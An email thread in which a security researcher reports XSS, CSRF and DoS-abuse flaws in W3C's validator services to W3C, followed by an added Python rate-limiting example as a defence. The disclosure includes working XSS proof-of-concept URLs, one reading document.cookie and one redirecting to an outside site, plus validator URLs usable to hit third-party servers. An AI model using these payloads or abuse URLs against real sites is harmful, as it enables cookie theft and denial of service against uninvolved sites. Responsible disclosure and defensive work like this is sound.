Hello Ian!

You are welcome.

First of all, fix all the XSS holes which I sent to you (in my two letters).

About the abuse of W3C's services due to Abuse of Functionality and
Insufficient Anti-automation vulnerabilities in W3C's validators: as you can
see, the abuse can be made due to Insufficient Anti-automation holes in all
mentioned validators - in total 11 vulnerable validators (12 scripts).
So if you fix these holes in all validators by adding protection from
automated requests (such as captcha), it fixes both the Insufficient
Anti-automation holes and, in 99%, the Abuse of Functionality holes.

In the case of W3C Link Checker (which can be used for conducting DoS attacks
on both W3C's and other sites' servers) it will not be enough, so
additional protection (to limit abuse) will be required. But in most cases
fixing Insufficient Anti-automation will be enough.

Besides, last week I wrote an article, Using of the sites for attacks on
other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
In this article I told about conducting attacks on other sites via Abuse
of Functionality vulnerabilities (similar to the holes at the W3C site).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From: "Ian Jacobs" <[email protected]>
To: "MustLive" <[email protected]>
Cc: <[email protected]>; <[email protected]>
Sent: Wednesday, June 30, 2010 6:39 PM
Subject: Re: Vulnerabilities at www.w3.org



On 30 Jun 2010, at 4:34 AM, MustLive wrote:

Hello administrator of www.w3.org!

I want to warn you about security vulnerabilities at your site.


Hi ML,

Thanks for sending this to us. We are aware of this and are looking into
finding the right balance between continuing to offer services and
avoiding abuse.

Best,

_ Ian

These are Abuse of Functionality, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.

Abuse of Functionality:

This functionality can be used for conducting CSRF attacks on other
sites.

http://validator.w3.org/feed/check.cgi?url=http://google.com

http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl

http://validator.w3.org/check?uri=http://google.com

http://jigsaw.w3.org/css-validator/validator?uri=http://google.com

http://validator.w3.org/checklink?uri=http://google.com

Note that the W3C Link Checker service can be used for scanning a whole
site, and so it consumes more resources, both of W3C's server and of the site
which is being scanned. It can be used for conducting DoS attacks on the
mentioned servers. I mentioned such attacks in the article DoS attacks
via Abuse of Functionality vulnerabilities
(http://websecurity.com.ua/2981/).

http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance

http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com

Insufficient Anti-automation:

On these pages there is no protection from automated requests (captcha),
which allows automating the process of conducting CSRF attacks on other
sites.

XSS (IE):

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl

Works only in Internet Explorer.

Attend to the security of all of your web sites and web software, and to
security audit.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4320/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

--
Ian Jacobs ([email protected])    http://www.w3.org/People/Jacobs/
Tel:                                      +1 718 260 9447
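
The reply at the top of this thread asks for protection from automated requests on the validators and for additional limits on the Link Checker. As an added example (not part of the thread and not W3C's code), here is a small in-memory throttle for a service that fetches user-supplied URLs, budgeting fetches both per requesting client and per target host; the class name, limit values and result strings are assumptions.

```python
import time
from collections import defaultdict, deque
from urllib.parse import urlsplit


class FetchThrottle:
    """Sliding-window limits for a service that fetches user-supplied URLs.

    Two independent budgets are enforced: one per requesting client and one
    per target host, so that many clients together cannot point the service
    at a single third-party site. State is in-memory and single-process
    (an assumption of this sketch; a shared store is needed behind a
    load balancer).
    """

    def __init__(self, per_client=10, per_target=30, window=60.0,
                 clock=time.monotonic):
        self.limits = {"client": per_client, "target": per_target}
        self.window = window
        self.clock = clock
        self.hits = defaultdict(deque)  # (kind, key) -> times of allowed fetches

    def _recent(self, kind, key, now):
        # Drop timestamps that have left the window, return what remains.
        q = self.hits[(kind, key)]
        while q and now - q[0] >= self.window:
            q.popleft()
        return q

    def check(self, client_ip, uri):
        """Return (allowed, reason); the fetch is recorded only if allowed."""
        try:
            parts = urlsplit(uri)
            host = (parts.hostname or "").lower()
        except ValueError:  # malformed authority, e.g. a broken IPv6 literal
            return False, "unsupported-uri"
        if parts.scheme not in ("http", "https") or not host:
            return False, "unsupported-uri"
        now = self.clock()
        client_q = self._recent("client", client_ip, now)
        target_q = self._recent("target", host, now)
        if len(client_q) >= self.limits["client"]:
            return False, "client-limit"
        if len(target_q) >= self.limits["target"]:
            return False, "target-limit"
        client_q.append(now)
        target_q.append(now)
        return True, "ok"
```

The per-target budget is the part that addresses use of the service against other sites: it holds even when requests arrive from many different client addresses.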